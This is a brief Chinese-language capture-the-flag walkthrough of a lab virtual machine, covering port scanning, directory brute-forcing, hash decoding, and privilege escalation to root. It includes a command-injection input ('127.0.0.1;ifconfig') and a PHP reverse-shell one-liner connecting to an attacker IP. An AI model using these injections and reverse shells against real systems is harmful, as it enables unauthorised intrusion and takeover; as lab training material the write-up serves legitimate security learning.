配置环境
攻击机kali : nat模式 ip:192.168.110.128
靶机: nat模式
使用nmap -sP 192.168.110.0/24 扫描出来靶机ip : 192.168.110.130
然后使用nmap -sS 192.168.110.130 -p 1-65535扫描端口,只扫描到33447/tcp端口
使用火狐访问页面:http://192.168.110.130:33447
查看源码,拉到最下面,发现0x643239334c6d70775a773d3d
使用kali中的dirb爆破目录
使用bp编码器
出现wow.jpg
访问http://192.168.110.130/images/wow.jpg
右键另存为到桌面,使用notepad++打开,发现
最后有数字
冒号去掉;
解码出来的值位7aee0f6d588ed9905ee37f16a7c610d4
是32位数字,有可能是md5加密
解密后:63425
继续使用dirb爆破目录
发现cake.php,
查看源码,title是/Magic_Box,猜测是目录
对http://192.168.110.130:33447/Challenge/Magic_Box/进行爆破
发现command.php,是命令执行页面
尝试输入命令:
127.0.0.1;ifconfig
出来结果,发现命令注入漏洞
kali nc监听:
在命令执行进行php反弹shell
127.0.0.1;php -r ‘$sock=fsockopen(“192.168.56.101”,5555);exec("/bin/bash -i <&3 >&3 2>&3");’
反弹成功
查找每个用户的文件
find / -user 用户名称 2>/dev/null -ls
发现/sbin/raw_vs_isi/hint.pcapng文件,这是一个网络流量抓包文件
在靶机上cd到/sbin/raw_vs_isi/目录
用python开HTTP服务
python -m SimpleHTTPServer 8080
然后在攻击机kali上 访问 http://192.168.110.130:8080进行下载
然后用wireshark打开,只看TCP协议的包,发现saman的密码:1337hax0r
su saman
输入密码1337hax0r
提权
sudo -i
输入密码1337hax0r
cat flag.txt
得到flag